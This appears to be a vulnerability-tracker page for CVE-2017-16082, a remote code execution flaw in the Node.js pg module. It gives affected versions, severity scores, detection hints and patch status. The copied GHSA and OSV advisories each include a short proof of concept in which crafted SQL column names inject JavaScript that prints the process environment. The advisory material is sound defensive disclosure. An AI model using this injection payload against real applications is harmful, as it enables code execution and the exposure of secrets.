CVE-2017-16082
published 2018-06-07CVE-2017-16082: A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are 2…
PriorityP261critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EPSS
10.51%
95.2th percentile
A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are 2 likely scenarios in which one would likely be vulnerable. 1) Executing unsafe, user-supplied sql which contains a malicious column name. 2) Connecting to an untrusted database and executing a query which returns results where any of the column names are malicious.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | node-postgres | < node-postgres 7.7.1-1 (bookworm) | node-postgres 7.7.1-1 (bookworm) |
| hackerone | pg_node_module | < 2.11.2 || >= 3.0.0 < 3.6.4 || >= 4.0.0 < 4.5.7 || >= 5.0.0 < 5.2.1 || >= 6.0.0 < 6.0.5 || >= 6.1.0 < 6.1.6 || >= 6.2.0 < 6.2.5 || >= 6.3.0 < 6.3.3 || >= 6.4.0 < 6.4.2 || >= 7.0.0 < 7.0.2 || >= 7.1.0 < 7.1.2 | 2.11.2 || >= 3.0.0 < 3.6.4 || >= 4.0.0 < 4.5.7 || >= 5.0.0 < 5.2.1 || >= 6.0.0 < 6.0.5 || >= 6.1.0 < 6.1.6 || >= 6.2.0 < 6.2.5 || >= 6.3.0 < 6.3.3 || >= 6.4.0 < 6.4.2 || >= 7.0.0 < 7.0.2 || >= 7.1.0 < 7.1.2 |
| node-postgres | pg | < 5.2.1 | 5.2.1 |
| node-postgres | pg | >= 0 < 2.11.2 | 2.11.2 |
| node-postgres | pg | >= 2.0.0 < 2.11.2 | 2.11.2 |
| node-postgres | pg | >= 3.0.0 < 3.6.4 | 3.6.4 |
| node-postgres | pg | >= 3.0.0 < 3.6.4 | 3.6.4 |
| node-postgres | pg | >= 4.0.0 < 4.5.7 | 4.5.7 |
| node-postgres | pg | >= 4.0.0 < 4.5.7 | 4.5.7 |
| node-postgres | pg | >= 5.0.0 < 5.2.1 | 5.2.1 |
| node-postgres | pg | >= 6.0.0 < 6.4.2 | 6.4.2 |
| node-postgres | pg | >= 6.0.0 < 6.0.5 | 6.0.5 |
| node-postgres | pg | >= 6.1.0 < 6.1.6 | 6.1.6 |
| node-postgres | pg | >= 6.2.0 < 6.2.5 | 6.2.5 |
| node-postgres | pg | >= 6.3.0 < 6.3.3 | 6.3.3 |
| node-postgres | pg | >= 6.4.0 < 6.4.2 | 6.4.2 |
| node-postgres | pg | >= 7.0.0 < 7.1.2 | 7.1.2 |
| node-postgres | pg | >= 7.0.0 < 7.0.2 | 7.0.2 |
| node-postgres | pg | >= 7.1.0 < 7.1.2 | 7.1.2 |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for PostgreSQL query results or SQL statements containing specially crafted column names that could be interpreted as code by the pg Node.js module ↗
- →Monitor for execution of user-supplied SQL containing untrusted or unusual column names passed through the pg module ↗
- →Alert on pg module connections to untrusted/external databases where query results with unexpected column names are returned ↗
- ·Vulnerability is fixed in pg module version 7.7.1-1 (Debian packages for bookworm, bullseye, forky, sid, trixie). Ensure the pg npm/Node.js module is updated to a patched version. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vendor_debian9.8LOW
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2017-16082: node-postgres - A remote code execution vulnerability was found within the pg module when the re...
vendor_debian·2017·CVSS 9.8
CVE-2017-16082 [CRITICAL] CVE-2017-16082: node-postgres - A remote code execution vulnerability was found within the pg module when the re...
A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are 2 likely scenarios in which one would likely be vulnerable. 1) Executing unsafe, user-supplied sql which contains a malicious column name. 2) Connecting to an untrusted database and executing a query which returns results where any of the column names are malicious.
Scope: local
bookworm: resolved (fixed in 7.7.1-1)
bullseye: resolved (fixed in 7.7.1-1)
forky: resolved (fixed in 7.7.1-1)
sid: resolved (fixed in 7.7.1-1)
trixie: resolved (fixed in 7.7.1-1)
GHSA
Remote Code Execution in pg
ghsa·2018-07-24
CVE-2017-16082 [CRITICAL] CWE-94 Remote Code Execution in pg
Remote Code Execution in pg
Affected versions of `pg` contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name.
There are two specific scenarios in which it is likely for an application to be vulnerable:
1. The application executes unsafe, user-supplied sql which contains malicious column names.
2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.
## Proof of Concept
```
const { Client } = require('pg')
const client = new Client()
client.connect()
const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`
client.query(sql, (err, res) => {
client.end()
})
```
## Recommendation
* Version 2.x.x: Update to versio
OSV
Remote Code Execution in pg
osv·2018-07-24
CVE-2017-16082 [CRITICAL] Remote Code Execution in pg
Remote Code Execution in pg
Affected versions of `pg` contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name.
There are two specific scenarios in which it is likely for an application to be vulnerable:
1. The application executes unsafe, user-supplied sql which contains malicious column names.
2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.
## Proof of Concept
```
const { Client } = require('pg')
const client = new Client()
client.connect()
const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`
client.query(sql, (err, res) => {
client.end()
})
```
## Recommendation
* Version 2.x.x: Update to versio
OSV
CVE-2017-16082: A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name
osv·2018-06-07·CVSS 9.8
CVE-2017-16082 [CRITICAL] CVE-2017-16082: A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name
A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are 2 likely scenarios in which one would likely be vulnerable. 1) Executing unsafe, user-supplied sql which contains a malicious column name. 2) Connecting to an untrusted database and executing a query which returns results where any of the column names are malicious.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2018-06-07
Published